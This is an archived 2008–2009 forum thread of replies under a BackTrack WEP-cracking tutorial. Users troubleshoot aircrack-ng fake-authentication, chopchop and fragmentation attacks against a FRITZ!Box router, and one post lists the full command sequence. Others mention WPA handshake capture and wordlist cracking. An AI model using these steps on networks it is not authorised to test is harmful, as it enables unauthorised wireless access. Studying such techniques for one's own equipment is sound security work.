Remote Exploit Forums

Go Back   Remote Exploit Forums > Archives > BackTrack v2.0 Final > Tutorials & Guides


Tutorials & Guides Contributions welcome! Please check the rules & guidelines for posting

Reply
 
LinkBack Thread Tools Display Modes
  #101 (permalink)  
Old 04-05-2008, 10:43 PM
-=Xploitz=-'s Avatar
Senior Member
 
Join Date: Apr 2007
Location: Mesquite, Texas (Dallas County) USA
Posts: 3,487
Default

Quote:
Originally Posted by bloody View Post
Yeah I followed it exactly and I think that I'm understanding the whole background so I don't think that I am messing something up!
So far I read you never came across a router that was unbreakable? well this one is, lol, none of the attacks worked! On my older router it's working fine!
Just curious how this one is unhackable!
Whats the name of the router and your card your using??
Reply With Quote
  #102 (permalink)  
Old 04-07-2008, 01:46 PM
Junior Member
 
Join Date: Jun 2006
Posts: 24
Default

It's FRITZ!Box Fon WLAN 7170
And I tried with Alfa and WUSB54G
Reply With Quote
  #103 (permalink)  
Old 04-07-2008, 04:10 PM
-=Xploitz=-'s Avatar
Senior Member
 
Join Date: Apr 2007
Location: Mesquite, Texas (Dallas County) USA
Posts: 3,487
Default

Quote:
Originally Posted by bloody View Post
It's FRITZ!Box Fon WLAN 7170
And I tried with Alfa and WUSB54G
Never came across a fritzbox yet. Aren't those made in Germany? AAhh ..yes they are. Even the great CISCO routers & AP's are vulnerable to at least the -5 Fragmentation attack. This Fritzbox shouldn't be any more difficult to crack. And you say you've tried ALL the available attacks? I might have to go out and buy one of these and test it out myself.

What attack are you using? And please list ALL commands you use....EXACTLY.
Reply With Quote
  #104 (permalink)  
Old 04-07-2008, 07:59 PM
Junior Member
 
Join Date: Jun 2006
Posts: 24
Default

Alright
Well I have another fritzbox that acts the same way, but playing with -1 6000 -o 10 I got it working... but this one still no luck, looks like the amv (builder of fritz box) have done something different!

What I do, well let's go... btw only change between both cards is rausb0 and wlan0, so I will do it only for the wlan0 interface!

ifconfig down wlan0
airmon-ng stop wlan0
macchanger -m 00:11:22:33:44:55
ifconfig up wlan0

airodump-ng wlan0
lets say channel 11 and mac 11:22:33:44:55:66
airodump -c 11 -w test --bssid 11:22:33:44:55:66 wlan0

alright, now I have tested different methods, first starting the -3/-4/-5 attack and then -1, but usually I try it this way:

aireplay-ng -1 0 -a 11:22:33:44:55:66 -h 00:11:22:33:44:55 wlan0
(also tried with different viriations like:
-1 6000 -o 1 -q 10
-1 6000 -o 10 -q 10 - successfull for an older fritz box giving me some arps ,)
-1 512 -o 1 -q 30
)

after that I get ACK packages and everthying is, so this command works!
(and there is no MAC filtering enabled, just in case)

Then I start aireplay -4 or -5 attack :
aireplay-ng -4 -b 11:22:33:44:55:66 -h 00:11:22:33:44:55 wlan0

I get some packet and I wanna use it then, then the described error above in the postings shows! thats all! using the -5 attack there is also the error that packages arre corrupt!

That's all!
Looking forward
Reply With Quote
  #105 (permalink)  
Old 05-04-2008, 04:46 PM
Junior Member
 
Join Date: Jun 2006
Posts: 24
Default

There is no follow up, so Im wondering if you cant reproduce it or can you, but you have no solution? or maybe some1 else?

TiA!
Reply With Quote
  #106 (permalink)  
Old 05-21-2008, 03:29 PM
Junior Member
 
Join Date: Oct 2007
Posts: 14
Thumbs up Thanks for another great TUT ! AAA+++ =)

Hey Xploits I just did my first chop chop attack on my AP which worked great !

Really great tut, v easy to follow and intergrate into your first wep cracking tut.

This one also served it's purpose as it shows an almost complete linux/aircrack suite n00b how to crack wep with no clients first time.

I have followed your third tut as well on wpa/wpa2, and gotten the 4 way handshake, though I gave up on cracking as I used that huge 2 gig word list, and didn't want to wait for ever for it to crack.

I'll use a smaller word list next time I try it, what's your default list ?

I've checked the share your wordlist thread, you recommend a few though i'de like to find out which word list is considered very efficient regarding thoroughness / size.

I read your last tut on speeding up the wpa crack, i'll try that as well, after i've finished tut3.

Cheers !
Mike
Reply With Quote
  #107 (permalink)  
Old 06-11-2008, 12:36 PM
Junior Member
 
Join Date: May 2008
Posts: 20
Default

thanks for this Tutorial
Reply With Quote
  #108 (permalink)  
Old 10-15-2008, 03:26 PM
Junior Member
 
Join Date: Oct 2008
Posts: 7
Default

Hi all. Great tutorial, just have one question.

When doing "aireplay-ng -4" option, I wait until it finishes and then I get this message:

Code:
Warning: ICV checksum verification FAILED! Trying workaround

The AP appears to drop packets shorter than 34 bytes.
Enabling standard workaround: IP header re-creation.
This does look like an IP packet, try another one.

Workaround couldn't fix ICV checksum.
Packet is most likely invalid/useless
Try another one.
Any idea why this is happening? Thanks.

EDIT: I retried the step by said "n" to the first packet it chose. I tried again several times until I had a different MAC address, and did not receive the error message. The rest worked like a charm!

Great tutorial -=Xploitz=-!

Last edited by goosed; 10-15-2008 at 03:34 PM. Reason: Noobetry
Reply With Quote
  #109 (permalink)  
Old 12-06-2008, 04:20 AM
Junior Member
 
Join Date: Nov 2008
Posts: 7
Default Thanks

Tut was great and easy to follow and worked for me first time, thanks alot.
Reply With Quote
  #110 (permalink)  
Old 03-21-2009, 10:40 AM
Member
 
Join Date: Dec 2006
Posts: 64
Thumbs up

Unbeliveble easy to follow!
This is so useful, have tried it on my ap and it works perfect!

I recommend this for begginers, srsly its soo easy.

Respect!
Reply With Quote
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On



All times are GMT. The time now is 01:09 PM.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.3.2